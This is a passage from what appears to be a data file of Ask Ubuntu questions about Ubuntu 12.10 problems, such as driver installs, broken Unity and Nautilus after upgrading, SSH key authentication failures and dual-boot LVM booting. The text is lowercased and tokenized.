0 not upgraded . need to get 311 mb of archives . after this operation , 392 mb of additional disk space will be used . do you want to continue [ y/n ] ?
204311	is there a google reader indicator ?	is there a working google reader unread feed indicator ? some sort of applet that checks for new unread messages from google reader and displays their title in a drop down menu or through the notify osd . most of the apps i found were either broken or outdated ; grnotify is n't updated anymore cloudsn does n't support google 's 2-step verfication feed indicator just does n't work , etc . ps : i dislike liferea and lightread just does n't work that well as an indicator but is an awesome reader .
204312	citrix receiver on ubuntu 12.10 ?	was anybody able to install citrix receiver on ubuntu 12.10 ? both 32 bit and 64 bit deb package fail to install properly . here is the error message for installing 64 bit package : sudo dpkg -i icaclient_12.1.0_amd64.deb ( reading database ... 139512 files and directories currently installed . ) preparing to replace icaclient 12.1.0 ( using icaclient_12.1.0_amd64.deb ) ... unpacking replacement icaclient ... dpkg : dependency problems prevent configuration of icaclient : icaclient depends on ia32-libs ; however : package ia32-libs is not installed . icaclient depends on nspluginwrapper ; however : package nspluginwrapper is not installed . dpkg : error processing icaclient ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : icaclient it seems like the problem is that it needs nspluginwrapper and nspluginwrapper needs nspluginviewer and nspluginviewer is not available in ubuntu 12.10 when i try to install the 32 bit deb package i get the following error message : sudo dpkg -i icaclient-12.1.0_i386.deb dpkg : error processing icaclient-12.1.0_i386.deb ( -- install ) : package architecture ( i386 ) does not match system ( amd64 ) errors were encountered while processing : icaclient-12.1.0_i386.deb any suggestions ?
204314	how do i search for folders in the dash ?	i have just installed ubuntu 12.10 . i installed also gnome-shell and everything works great . i just have a small problem . in ubuntu 12.04 when i typed the name of a folder in the dash of gnome 3 i would get an icon where i could open this folder . now in ubuntu 12.10 i just get results for programs and configuration but no folders . does anyone has the same problem ? is there a solution ?
204316	has anyone been able to get ubuntu 12.10 to run on a lt4004u netbook ?	i recently purchased a new netbook ( gateway lt4004u ) and am realizing i should have taken the thing back the instant it started having issues . when i upgraded the hardware ( ram and battery ) in the netbook , i installed ubuntu 12.10 , and to my dismay , i found that the system would not even boot ! it would display the loading screen , and then the display would suddenly blank out , and it would not respond to any input . help ? anyone ? i think this may be due to an issue with the intel gma 3600 gpu in the netbook . any suggestions ?
204320	ubuntu fail to start on a dual boot with windows 7 on vaio	i followed the instructions for the ubuntu windows installer on my sony vaio laptop ( model svt131a11m ) . upon restart i was prompt to choose the os for boot ( win7 or ubuntu ) , but then i shut down the machine and from the next boot , every time i choose to boot into ubuntu , the gnu grub terminal appears with a grub > prompt . now i 'm able to boot into win7 , but ca n't boot into ubuntu properly . why does it happen and how come i was able to start ubuntu successfully the first time ?
204322	additional drivers tool in ubuntu 12.10 ?	so i just upgraded to ubuntu 12.10 and noticed that the additional drivers tool is gone . so how do i install the proprietary drivers for my pc ?
204326	problem with hard drive space	i have a problem , my .private is using the 100 % of my free hard drive space , i have no idea of how to solve this ... why is file is using every bit on my hd , how can i fix it ? this is the menssage of space using on the terminal : andrey @ andrey-vaio : ~ $ df -k s.ficheros 1k-bloques usado disponible uso % montado en /dev/sda3 53876204 7128424 44010988 14 % / udev 1848456 4 1848452 1 % /dev tmpfs 757452 920 756532 1 % /run none 5120 0 5120 0 % /run/lock none 1893624 396 1893228 1 % /run/shm /dev/sda1 249920700 236820380 405008 100 % /home /home/andrey/.private 249920700 236820380 405008 100 % /home/andrey /dev/sr0 4482226 4482226 0 100 % /media/disk i have my home on a particion and the os on other , the big problem is that now a could n't save documents because i do n't have free space .
204334	how to force a recheck on purchasable apps on usc ?	i 've been trying to install some games via the usc , but they keep on saying they are not compatible with my ubuntu version . however , when i check online , for example here : https : //apps.ubuntu.com/cat/applications/fieldrunners/ it says that 12.10 is available . however , when i open usc , it refuses to install it , stating that it 's `` not available for this ubuntu version '' .
204339	suspend on power button when session is locked	is it possible to configure ubuntu so that the power button causes suspend regardless of whether the session is locked or not ? see here , for example . that configuration does not work , however , if the session is locked . note that my question is essentially the same as this one , but the given answer does n't fully answer the question .
204348	ubuntu 12.10 is slow and some programs gose to non-respond state	ubuntu 12.10 is so slow and a lot of not responding applications i was using skype whenever i open it it will go to non-responding state thin back to normal after a while even the software centre the system process is eating the cpu i donât know if the compiz is the problem but issuing the command compiz -- replace restore the applications from non-responding state cpu : intel celeron d 3.4 ram : 1 gb vga : intel g45 plz help
204349	unity is broken after upgrading to 12.10 ( optimus laptop )	i upgraded to gnu/linux ubuntu 12.10 but have been unable to use unity properly afterwards . indeed , i encountered the exact same problem as a lot of people : the unity side and top bars are not displaying , although in my case , unity seems completely broken , as i ca n't even right-click . however , in my case , it 's worth noticing that i have an optimus laptop with a nvidia graphics card ( geforce gt 540m ) . bumblebee and its 'optirun ' command is working just fine , as usual , after the upgrade . i tried several things , as resetting compiz and unity ( with the command 'setside unity ' ) -- which works but i have to do it everytime i boot and it resets all my settings -- updating/reinstalling/reconfiguring my nvidia drivers as well as bumblebee , trying with nouveau drivers instead of nvidia-current , check if linux-headers-generic were installed ( they were ) . however , i could n't reset xorg.conf files as they 're just not there . there is neither xorg.conf file , nor its backup in /etc/x11 . i think this is where the problem comes from , although i 'm far from an expert . maybe retrieving a xorg.conf file will fix this mess , but i have no idea how to do that . i 'm just tired and do n't know what to do . so , here i am , begging for your help .
204350	can not log in to all account except guest after mounting new partition	in order to do my homework from school , since two days ago , i installed oracle 11g on my computer running ubuntu . while i was installing oracle 11g , after setting the password for oracle and clicking `` next '' , the installer said that there was not enough space for the home/oracle folder , so to make another space , i mounted another space after checking gparted and using software device management , i mounted it . since then , i have not been able to log in to my own administrator account or to the oracle account ( which i made for oracle 11g on ubuntu ) : when i type the password for it , it seems to work but it then redisplays the first page to log in , without really logging in . so i logged in to the guest account , but i can not even try gnome console manipulation to restore or fix it , because it is the guest account . firstly , is there any way i can fix things ; secondly , when oracle said it did n't have enough space for its home folder , what should i have done ?
204352	what are the benefits of six month release cycle ?	if possible , could anyone explain the benefits of ubuntu 's six month release cycle ? i can think of some benefits like to provide users with a release without bugs from previous one and updated software but nothing else . maybe , to know how long which release must be supported is another reason . thank you in advance .
204365	can not reinstall unity - broken dependencies	i 've lost my unity after sudo apt-get autoremove -- purge unity-webapp and cleaned the system with ubuntu tweak . i try to install it , but i always get a warning of broken dependencies ... i 've added the unity team ppa , dist-upgrade , among other efforts . ( same with unity 2d ) when i try to install ubuntu-desktop i get this : e : unable to correct problems , you have held packages ( hold ) spoiled . please help me ! [ ubuntu 12.10 ]
204374	how to install diablo 2 lord of destruction ?	i first tried to install diablo 2 lod from an iso image using acetone iso . however , after acetone iso mounted the image , it said `` please install the labelled disc '' . i then tried with gmount , and , following advice i received from some forums , i attempted to create mount points and then install ; after it mounted the image , it installed the first three disc images but not the expansion . when i tried to play , it told me to insert the labelled disc , even though the iso image was still mounted with gmount . how can i resolve this problem ?
204375	error while installing wine	while trying to install wine on my computer , i got the following error : $ sudo apt-get install wine1.5.1 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package wine1.5.1 e : could n't find any package by regex 'wine1.5.1' how can i install wine ?
204380	how to enable 3d acceleration with sis vga 771/671 on ubuntu 12.04	it 's been a while since i configured a good resolution with my sis vga 771/671 . how can i enable the 3d acceleration with this video card ?
204387	can i use my old home partition and just format the root partition when installing ubuntu ?	i installed ubuntu 's root on one partition and /home on another . now if i format the root partition , install fresh ubuntu , and mount the previous /home partition as /home , will it pick up all my previous files and folders ?
204389	how to install samsung-backlight on ubuntu 12.10 ?	i 'd like to install samsung-backlight from voria tools as suggested here , but after adding the ppa i can read some 404 errors for http : //ppa.launchpad.net/voria/ppa/ubuntu/dists/quantal/main/source/sources when doing sudo apt-get update . does this mean that there is no samsung-backlight for ubuntu 12.10 ? how can i install it ?
204390	evolution , the background of messages is always grey	with evolution 3.6 on ubuntu 12.10 all the email messages have grey backgrounds in the default theme ( and every other one that i have tried ) . when using grey or black text , which is standard in most themes , the grey background makes it quite hard to read email messages . is there a way to correct this behaviour , i.e . have a white background on emails in evolution as in former version of ubuntu ?
204392	emacs shell mode pointer always goes to middle	i have been using emacs shell mode for some time , but one thing keeps bothering me . after i split the window vertically with ctrl+3 , invoke m-x shell and fill the window with commands and output , whenever i execute a command , the pointer jumps to the middle of the screen , where there are usually outputs of previous command . i could alt+ > to jump to where the new prompt is , but that is tedious . however , emacs works well if i do not split the window , i.e . keeps the pointer at the bottom of the screen . another fact ( not the same question ) that i happened to found is that i could keep all the outputs in the upper half of the screen , while leaving the lower half blank . is this triggered by some shortcut ? for clarification , i just want my emacs shell 's output behave like a common shell like bash , i.e . keeps the pointer at the bottom . the pointer in emacs sometimes jumps to the middle of the screen after i enter a command . hopefully i have made myself understood .
204393	why is wine not installable on my system ?	so i upgraded on a fresh install to ubuntu 12.10 , not beta , and i 've tried installing wine many many times now many different ways but the jist of it is this : this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . the following packages have unmet dependencies : wine : any ideas ? it wo n't let me install the dependencies either it says it needs another set of dependencies to install them -_- im on asus kj50 64bit os dual boot with windows 7 sudo apt-get install wine1.5 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.5 : depends : wine1.5-i386 ( = 1.5.15-0ubuntu1 ) but it is not installable recommends : gnome-exe-thumbnailer but it is not going to be installed or kde-runtime but it is not going to be installed recommends : ttf-droid recommends : ttf-mscorefonts-installer but it is not going to be installed recommends : ttf-umefont but it is not going to be installed recommends : ttf-unfonts-core but it is not going to be installed recommends : winbind but it is not going to be installed recommends : winetricks but it is not going to be installed e : unable to correct problems , you have held broken packages .
204395	how do i use lvm with 12.10 when i already have windows 8 ?	i asked about the best way to setup a pc with windows 7 , windows 8 and ubuntu 12.10 here and followed the recommended order . but when i try to install ubuntu 12.10 it does n't allow me to select lvm without blowing away the windows 8 installation . if i select the advanced option i ca n't create another partition ( there 's room on the drive ) . is wubi the only option ? or do i need to setup the partition before running the ubuntu installer ? ( not sure how to get screenshots from the installer )
204400	ssh public key - no supported authentication methods available ( server sent public key )	i have a 12.10 server setup in a virtual machine with its network set to bridged ( essentially will be seen as a computer connected to my switch ) . i installed opensshd via apt-get and was able to connect to the server using putty with my username and password . i then set about trying to get it to use public/private key authentication . i did the following : generated the keys using puttygen . moved the public key to /etc/ssh/myusername/authorized_keys ( i am using encrypted home directories ) . set up sshd_config like so : pubkeyauthentication yes authorizedkeysfile /etc/ssh/ % u/authorized_keys strictmodes no passwordauthentication no usepam yes when i connect using putty or winscp , i get an error saying no supported authentication methods available ( server sent public key ) . if i run sshd in debug mode , i see : pam : initializing for `` username '' pam : setting pam_rhost to `` 192.168.1.7 '' pam : setting pam_tty to `` ssh '' userauth-request for user username service ssh-connection method publickey [ preauth ] attempt 1 failures 0 [ preauth ] test whether pkalg/pkblob are acceptable [ preauth [ checking blacklist file /usr/share/ssh/blacklist.rsa-1023 checking blacklist file /etc/ssh/blacklist.rsa-1023 temporarily_use_uid : 1000/1000 ( e=0/0 ) trying public key file /etc/ssh/username/authorized_keys fd4 clearing o_nonblock restore_uid : 0/0 failed publickey for username from 192.168.1.7 port 14343 ssh2 received disconnect from 192.168.1.7 : 14 : no supported authentication methods available [ preauth ] do_cleanup [ preauth ] monitor_read_log : child log fd closed do_cleanup pam : cleanup why is this happening and how can i fix this ?
204401	make amazon web app and unity lens search amazon.co.uk instead of .com	i 'm from portugal and i use amazon.co.uk a lot . the problem is that the web app and the new unity shopping lens only show results from amazon.com . can i change the default to search amazon.co.uk ? how ?
204404	can i install windows drivers in ubuntu	i do not know if the proper drivers are install because the system has a lot of lag and crashes at times . can i install windows drivers in ubuntu ?
204405	how to change desktop shell to only gedit and wallpaper ?	i 'm working with the uck tool to get customized ubuntu live image ( kernel ) . it can be fully customized with it , but i can not change desktop shell . normally , when booting with the live cd , there 's no log-in session . so what i want to do is as below . after boot with my live cd , my applications ( ex , gedit ) are the only ones to auto-start along with my wallpaper with some logos . in other words , is it possible to change desktop shell to just my application , with no desktop icons , task bar and panel ?
204410	how do i install the latest ati catalyst video drivers in ubuntu 12.10 quantal ?	there are other threads related to this question for ubuntu 12.04 , however they do not apply to 12.10 . this is not a duplicate of another thread if the referenced thread does n't answer the question asked .
204411	sending sms using empathy	i 've got gnome-phone-manager installed on ubuntu 12.04 , and noticed it adds an sms account type to empathy . the only setting required to set up is 'bdaddr ' which i think is a blue tooth address . i setup everything by blue tooth settings and configure in empathy . but no sign of using it feature
204412	no sound on tv with hdmi	i am using ma78gm-s2h mainboard and gtx260 , there is no sound on ubuntu . there is a spdif connection from my videocard to mainboard . and it connected with hdmi to my tv . it works fine with windows but not with ubuntu . is there any way to fix this ? i tried everything like troubleshooting , nvidia driver , alc889 driver etc . edit : there is only analog and digital choices exist at settings
204420	12.10 boots to desktop with icons , but no panels , no taskbar	installed 12.10 from livedvd on dell desktop that ran ubuntu in original machine . it boots to plain desktop with icons carried over from 12.04 , but no dash or menu and no taskbars . help !
204422	juju wordpress open-ports : [ ]	testing juju from the ppa on aws on precise . environment successfully bootstrapped , mysql and wordpress unit started , db relationship successfully added . on exposure of wordpress i have no open ports ( which imo should be configured by the charm -- tried to upgrade charm , but already using latest wordpress-9 from the ppa ) . open-ports : [ ] i would like to open the port , but why do i have to do it manually ? and how can i do it ? i tried to use the open-port command , but it asks for a juju_client_id and a juju_agent_socket which i am not sure what they should point at . i have read online other users do n't need to open ports ... it should work ootb . juju status fyr : machines : 0 : agent-state : running dns-name : xxx.amazonaws.com instance-id : yyy instance-state : running services : mysql : charm : cs : precise/mysql-8 relations : db : - wordpress units : mysql/0 : agent-state : started machine : 0 public-address : xxx.amazonaws.com wordpress : charm : cs : precise/wordpress-9 exposed : true relations : db : - mysql loadbalancer : - wordpress units : wordpress/0 : agent-state : started machine : 0 open-ports : [ ] public-address : xxx.amazonaws.com
204424	nautilus will not launch after update to 12.10	i updated to ubuntu 12.10 today from 12.04 using the graphical update tool . everything seemed to be fine until i went to open nautilus , and it would not open . bizarrely , i am able to open a file that i happen to have on my desktop , but when i click on the launcher , it never opens . when i enter 'nautilus ' in the terminal , i get this : ( nautilus:8557 ) : gdk-critical ** : gdk_x11_display_get_xdisplay : assertion `gdk_is_display ( display ) ' failed zsh : segmentation fault ( core dumped ) nautilus i am not a total novice with ubuntu or linux , but all i can tell is that there is some problem with x . can someone please point me in the right direction as far as fixing this ? i really do n't want to have to do a fresh install . thank you very much .
204428	unity missing ? ca n't see top or side panels	i just removed some effects using ccsm , switched to the amd proprietary driver , rebooted and after i log in , the unity panel is no longer there . if i hit the windows key or the alt key , nothing happens . i can hit ctrl+alt+t to get a terminal ( and thus launch apps via commandline ) . does anyone know how i can fix this ? what logs do i need to post here for help ? edit # 1 : as suggested by @ cprofitt i just ran : dconf reset -f /org/compiz/ & & setsid unity i 'm seeing some compiz messages in the terminal now : unity-panel-service : no process found compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core compiz ( core ) - info : loading plugin : ccp compiz ( core ) - info : starting plugin : ccp compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : unity compiz ( core ) - info : loading plugin : composite compiz ( core ) - info : starting plugin : composite compiz ( core ) - info : loading plugin : opengl x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 155 ( atifglextension ) minor opcode of failed request : 66 ( ) serial number of failed request : 23 current serial number in output stream : 23 compiz ( core ) - info : unity is not supported by your hardware . enabling software rendering instead ( slow ) . x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 155 ( atifglextension ) minor opcode of failed request : 66 ( ) serial number of failed request : 23 current serial number in output stream : 23 compiz ( core ) - info : unity is not supported by your hardware . enabling software rendering instead ( slow ) . compiz ( core ) - info : starting plugin : opengl compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( core ) - error : plugin initscreen failed : opengl compiz ( core ) - error : failed to start plugin : opengl compiz ( core ) - info : unloading plugin : opengl compiz ( core ) - info : loading plugin : compiztoolbox compiz ( core ) - info : starting plugin : compiztoolbox compiz ( core ) - error : plugin 'opengl ' not loaded .
204435	cant keep session in some sites with wifi antenna	i have a wifi antenna p2p connection with a router to connect with the server ( ppp ) . then i have another wifi router that connect with the first one with lan . then i connect my notebook with the second with wifi . i used to have another server that didnt use ppp and i didnt have any trouble with my internet . now with this new one i cant access sites that have session/cookie like gmail or facebook . on windows the internet works fine , but on ubuntu and my android keep loading until expires . i tried one time use `` # dhclient -r ; dhclient '' . it worked , but now i tried again and nothing . i have no idea what i can do .
204441	windows 7 and ubuntu 12.04 start up problems	i have windows 7.i tried to install ubuntu and the installation was almost over when an error message popped up and the installation failed . then i rebooted the computer but the computer wont start . a blank screen appeared and nothing is happening . the same thing is happening every time i am starting my computer . how can i solve it ? please help .
204445	log php errors in ubuntu	i followed the setup here : where is the php error log when i look into /var/log/php_errors.log , i could see some php errors . php warning : file_get_contents ( /var/www/ ... ) : failed to open stream : no such file or directory in ... but what i 'm trying to see is the error when i removed a semicolon from a statement . that error above has no relation to file from where i removed the semicolon so we can just ignore that . when i access the page with the removed semicolon , i get the website encountered an error while retrieving https : //myapp/download/decode/testfile . it may be down for maintenance or configured incorrectly . http error 500 ( internal server error ) : an unexpected condition was encountered while the server was attempting to fulfill the request . but no logs in /var/log/php_errors.log . how do i see the error that usually says which line and which file the process failed ? the real reason for trying to see the error is because i have a very huge loop , that throws the http 500 error and i ca n't see the exact error . i 'm just simulation with a removed semicolon to test things out . other settings : error_reporting = e_all & ~e_deprecated display_errors = on on ubuntu 10.04.4 lts update ok , i managed to get the error message to display . parse error : syntax error , unexpected t_if in ... however , it 's still not logged . it was n't displaying previously because cakephp 's debug level was at 0 . setting it to 2 displays the message , but no logs . update 2 i believe it is a cakephp specific problem and limitation . closing case here .
204449	dropbox does n't leave `` connecting ... '' state	after installing dropbox in 12.10 it does n't connect properly . all files get synced without any problems , but in the drop down menu ( icon in the top bar ) it keeps showing `` connecting '' for 3 days now ... in 12.04 it shows account stats etc.. any way to solve this ?
204452	hyperv integration services v3.4 for 12.10 ?	networking is sloooow with v3.1 how to upgrade to integration services v3.4 in 12.10 ? modinfo output in 12.10 filename : /lib/modules/3.5.0-17-generic/kernel/drivers/hv/hv_vmbus.ko version : 3.1 license : gpl srcversion : b1aa963eefbae322d970f14 alias : acpi* : vmbus : * alias : acpi* : vmbus : * depends : intree : y vermagic : 3.5.0-17-generic smp mod_unload modversions
204453	virtualize ubuntu 11.04 from my usb stick	i need to be able to virtualize ubuntu 11.04 from my usb stick , which will enable to save files on it and when i boot my usb stick on other computers i can still be able to open up the same files . from my understanding , what i need is a non-live cd installation which most creator that i found on the internet is unable to provide .
204462	revert/change automount settings in 12.10	i upgraded from 12.04 to 12.10 , and now my disk automount as /media/user/uuid when i was on 12.04 , it was simply /media/uuid [ uuid or label ] , and i would like to change it back . syslog : oct 21 23:08:53 dv6 udisksd [ 2562 ] : mounted /dev/sdc1 at /media/matt/1dxxxxxxxxxx2ca1 on behalf of uid 1000 however if i umount , and run udisks -- mount /dev/sdc1 it then mounts as /media/1dxxxxxxxxxx2ca1 , which is exactly what i want . i looked for some kind of udisksd conf file , but i could n't find anything .
204465	how do i get back into windows ?	windows 7 started giving me a lot of problems lately and i 've been wanting to try ubuntu for awhile , so i got linux live usb creator and the ubuntu iso . i did n't have any usbs or blank cds , so i made it boot from my extra d drive . now when i turn on my computer , it automatically boots into ubuntu for some reason and i have no option to get back into windows . i can press shift on the grub and get into the thing that say boot : but i do n't know what to type to make windows boot . i 'd be fine with not getting back into windows if ubuntu would install , but it gives me an error every time i try to install it , so i assume doing it from the cd drive just is n't going to work or something and i need to get back into windows and undo what i did to my d drive and wait until i get a usb to do it with . but the first problem i have to deal with is how am i supposed to get back into windows ? right now i ca n't get into any os except for ubuntu 's live version . thanks for any help you can give me . edit : i do n't think my computer even recognizes windows 7 is on it any longer . when ubuntu tries to install , i do n't get the `` install alongside windows 7 '' or `` replace windows 7 with ubuntu '' ( not the exact wording , i know ) options , windows 7 does n't show up anywhere at all . it 's just gone . and i do n't see a second hard drive in my laptop , so i think maybe i changed the hard drive itself to an ubuntu iso installer . i 'm really not sounding like the brightest person right now , i know . when i click on `` os '' in ubuntu live version , though , it still has all the windows files and all the folders from my old c drive from windows 7 . i really do n't know what 's going on . at this point it looks like the only plausible option is to just take this hard drive out and replace with with a hard drive from my other laptop .
204467	g5 quad core will not boot from ubuntu cd	i have a ppc g5 quad core with leopard on one hard drive and i want to install ubuntu on a second hard drive . the second drive is installed and formatted as a mac os extended ( journaled ) drive . i have had no success booting from a cd or dvd with various ppc versions of ubuntu using any of the suggested keys such as `` c , option , or anything else . booting into open firmware does n't work as the system ca n't find the \install\yaboot file . i am using various cd 's burned as iso disk images , but none will boot . i have reset the pram , etc , to no avail . beginning to get very frustrated . can someone shed some light and provide me with a command line in open firmware that will work , or else direct me to a confirmed ppc bootable version of ubuntu please ? i 'd appreciate any help you can provide ... .
204468	how to sync two computers daily	i have two computers running ubuntu , one is my work computer and other is home computer . i 'd like them to behave as basically the same computer . any programs installed or files changes on one computer would be reflected in the other computer . so like when i come home , i could press 'sync ' , and the changes made during the day on my work computer would appear on my home computer . is this possible ?
204473	problem while installing amd driver on ubuntu 12.10 on my dell inspiron 5520	i have a dell inspiron 5520 which has switchable graphics mode with amd radeon hd 7600m . i have recently installed ubuntu 12.10 alongside windows . but i ca n't install the driver for grahics card . while typing `` sudo apt-get install fglrx-installer '' it says unable to locate the package . while adding the repository ubuntu-x-swat/x-updates it shows error that '' the requested url /ubuntu-x-swat/x-updates/ubuntu/dists/quantal/main/binary- i386/packages was not found on this server . '' in another attempt i download driver from amd-driver site , and then installing from terminal it shows that some errors come while installing and i get the blank screen only . so how to install the amd driver on my laptop .
204481	how to install perl switch.pm module required to build webkit-gtk ?	i noticed that the perl version ( 5.14 ) shipped with 12.10 does not include the switch.pm module needed while building webkit-gtk . looking around on the internet i found few suggestions indicating that i should install something call p5-switch from ports . i have looked around and was not able to get this done . i am not a perl guy and have no idea where i can get this package . can someone please help me as to where to download the package for ubuntu 12.10 in case it is not a .deb , how do i install it .
204483	mobile broadband not working in 12.10	i recently installed ubuntu 12.10 and connected to mts mblaze . i get the message `` connection established '' . but when i open firefox , i ca n't view any web page .
204484	mysql install error ?	i 'm trying to get a lamp server running on my ubuntu installation . i have ssh and apache working without any problems . i installed mysql with sudo apt-get install mysql-server mysql-client as usual with proir installations i 've done it asked for a password . and looked like everything was fine . except when i tried to test it out . mysql -u root -p error ca n't connect to local mysql server through socket /var/run/mysqld/mysqld.sock i went to the file location and there was no mysqld.sock file . i googled around for a while , and one response was to restart via /etc/init.d/mysqld restart . there 's no mysqld file in my init.d folder either ! ! ? ? what 's going on here ? any suggestions ? how can i install and reinstall mysql ? is there some reason that the mysql service is n't installing ?
204488	ubuntu hang out with this message : blocked for more than 120 seconds	i 'm running a virtualmachine on esxi -- ubuntu as a webserver -- ( apache2 with nginx as his proxy , php , mysql ) and services keeps hanging/freezing causing the whole server to be unresponsive . it 's not possible to connect to it by ssh , basicly it requires a reboot from vsphere to come back online . description : ubuntu 10.04.1 lts release : 10.04 codename : lucid at vsphere i see this message when my server is unreachable : : info : task : apache2 ( or mysql or nginx ) blocked for more than 120 seconds . `` echo 0 > /proc/sys/kernel/hung_task_sys_timeout_secs '' disables this message i think that likely it happens in high traffic on my sites what could i do ? ! thanks
204495	reliance net connect and ubuntu 12.04	i added recently purachased a reliance net connect broadband+ . it has both balance and validity . i connected it . it was detected . i added a new mobile broadband connection . chose the details properly i edited the connection and provided user name and password but it consistently fails to connect . i get an error that says there is some internal error with /usr/sbin/modem-manager but i am not able to figure out what is wrong . then i gave up and tried the instruction here . that is not working either . i am lost . has anybody set up this model on ubuntu 12.04 ?
204496	wo n't boot after upgrade from 12.04 to 12.10	i forced an upgrade from kubuntu 12.04 to 12.10 and when booting it sticks on the loading screen . looking at the boot log shows me that 'starting k display manager ' as 'failed ' . how can i fix this ?
204499	lost the oppurtunity of adding facebook app on launchbar - ubuntu 12.10	i upgraded my ubuntu to version 12.10 yesterday , and am of course all excited about it . one thing i was looking forward to , was to get the `` app-icon '' of facebook assigned to the launch bar . but , i did a stupid mistake . first i installed the upgrade , so i got ubuntu 12.10 . then i restarted the pc as requested . when i then entered my facebook account for the first time , i got the question `` do you want to install ... . '' , and then i answered no ... .. do n't know what i was thinking . and now , of course , i cant get this same question again if i want to `` install the facebook app ... '' . it does n't help logging out of facebook , and logging in again . not even with another facebook account . so , my question is : how do i fix this ? i want to get the `` facebook-app '' on my lanuch bar , with all the `` privileges '' that follows .
204503	installation of software from ubuntu software centre	when i try to install softwares from software centre i get an error message as follows : requires installation of untrusted packages in details the following is mentioned : libcddb2 libdvbpsi7 libebml3 libiso9660-8 libmatroska5 libresid-builder0c2a libsdl-image1.2 libsidplay2 libtar0 libupnp3 libva-x11-1 libvcdinfo0 libxcb-composite0 libxcb-keysyms1 libxcb-randr0 libxcb-xv0 whether i click on ok or repair either ways the window closes and i can not download & install the software .
204506	nautilus stopped working after update to 3.6.1	this morning the ubuntu update manager upgraded nautilus to 3.6.1 srirangan @ pangolin76 : ~ $ nautilus -- version gnome nautilus 3.6.1 after which it has stopped working srirangan @ pangolin76 : ~ $ nautilus ( nautilus:2713 ) : gdk-critical ** : gdk_x11_display_get_xdisplay : assertion `gdk_is_display ( display ) ' failed segmentation fault ( core dumped )
204508	upgrade sudoer to 1.8.1 or above	what 's the best way to upgrade the sudo from 1.7.2 by default to 1.8.1 or above ? i 've an auditing program that required sudo 1.8.1 or above . i 'm using ubuntu 10.04 . thanks a lot .
204510	how to install python 2.5.4 ?	i have installed ubuntu 12.10 on my laptop , now i want to use python 2.5.4 for educational purpose . can any one help me with step by step instructions ... i also need idle for 2.5.4 .
204513	what are the best python ides ?	what are some of the best python ides for ubuntu 12.04 ? would you benefit from me learning python ?
204520	how can i add links/launchers icons to gnome 3 panel ?	i 'm a ubuntu 12.10 user , and i want to know how to place link icons in the gnome 3 panel . does anybody know how to solve this matter ? p.s . : in the gnome panel i do n't have the on/off button and the other icons on the upper right corner of the screen . please help me ! : )
204525	ubuntu does n't load after update from 12.04 to 12.10	i 've updated ubuntu from the update manager and after a proposed reboot it stopped loading and the computer hung up . what shall i do in this situation ? it hangs up on the page listed in image below :
204526	what is my ubuntu version ?	i download the latest ubuntu beta 12.10 few days ago . now , i completely updated after final release of ubuntu 12.10 . how can i check whether iam still running the same beta version ?
204537	vlc player scrambled audio after skipping through a movie	when i watch a movie in vlc and i fast forward or backward the sound suddenly becomes very creaky , it sounds hollow and scrambled , after a few minutes it goes away . i just installed ubuntu 12.10. and before that i had xubuntu , then i had the same problem . totem works fine . does anyone have any idea how i can fix this ? greetings mies
204546	how to install ubuntu 12.10 with / partition on lvm ?	after installing ubuntu 12.10 i can not boot my machine anymore . i get the following error . gave up waiting for root device . common problems : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/mapper/isw_cjchifbged_volume0p6 does not exist . dropping to a shell ! i installed ubuntu 12.10 on a system that has windows 7 and intel rapid start ( win swap partition ) on it . the hard disk is a fakeraid0 , which is understood by the live cd . i wanted a dual boot , so i had a primary /boot partition and the rest of ubuntu in a lvm . windows resides in two primary partitions ( one 60gb for c : and one 350mb for booting windows 7 ) how do i install ubuntu 12.10 in such a situation ? the 12.04 installer seemed to understand my intentions with the lvm and delivered a bootable system . i can not choose the `` install on lvm '' option , as this will destroy my already existing lvm with the win7 swap/hibernation partition . instead , i chose `` something else '' and appointed existing partitions ( /boot , / , /home , swap ) to be used for installation . my partition scheme is listed below , but bear in mind that this is backup information from when i had 12.04 installed . the scheme used for the 12.10 installation varies slightly , but it 's conceptually similar . disk /dev/mapper/isw_cjchifbged_volume0 : 256.1 gb , 256066715648 bytes 255 heads , 63 sectors/track , 31131 cylinders , total 500130304 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 32768 bytes / 65536 bytes disk identifier : 0xe240c089 device boot start end blocks id system /dev/mapper/isw_cjchifbged_volume0p1 * 125831168 126547967 358400 7 hpfs/ntfs/exfat /dev/mapper/isw_cjchifbged_volume0p2 126547968 127062015 257024 83 linux /dev/mapper/isw_cjchifbged_volume0p3 2048 125831167 62914560 7 hpfs/ntfs/exfat /dev/mapper/isw_cjchifbged_volume0p4 127062016 500127743 186532864 f w95 ext 'd ( lba ) /dev/mapper/isw_cjchifbged_volume0p5 483315712 500127743 8406016 84 os/2 hidden c : drive /dev/mapper/isw_cjchifbged_volume0p6 127064064 168024063 20480000 83 linux /dev/mapper/isw_cjchifbged_volume0p7 466497536 483313663 8408064 82 linux swap / solaris /dev/mapper/isw_cjchifbged_volume0p8 168026112 466495487 149234688 83 linux partition table entries are not in disk order what i tried in order to fix things was the following : boot from live cd ( actually : usb drive ) , mount / , /boot , /dev , /sys and /proc and chroot into that system ( following this guide ) , apt-get install lvm2 ( which was not installed ; following this guide ; dpkg-reconfigure lvm2 is automatically triggered ) this did not fix my problem . when i inspected /dev/mapper from that shell ( busybox built-in shell ash ) , it was empty . since i overwrote my previous ubuntu 12.04 installation , there was no windows mbr , and thus the grub installer did not create a windows option . to make sure i could boot at least something , i ran the windows recovery tool bootrec.exe /fixmbr . now i have a totally inaccessible zombie-ubuntu on my disk : p
204548	message indicator for liferea missing in ubuntu 12.10 ?	how do i get back how to get back message indicator for liferea in ubuntu 12.10 ?
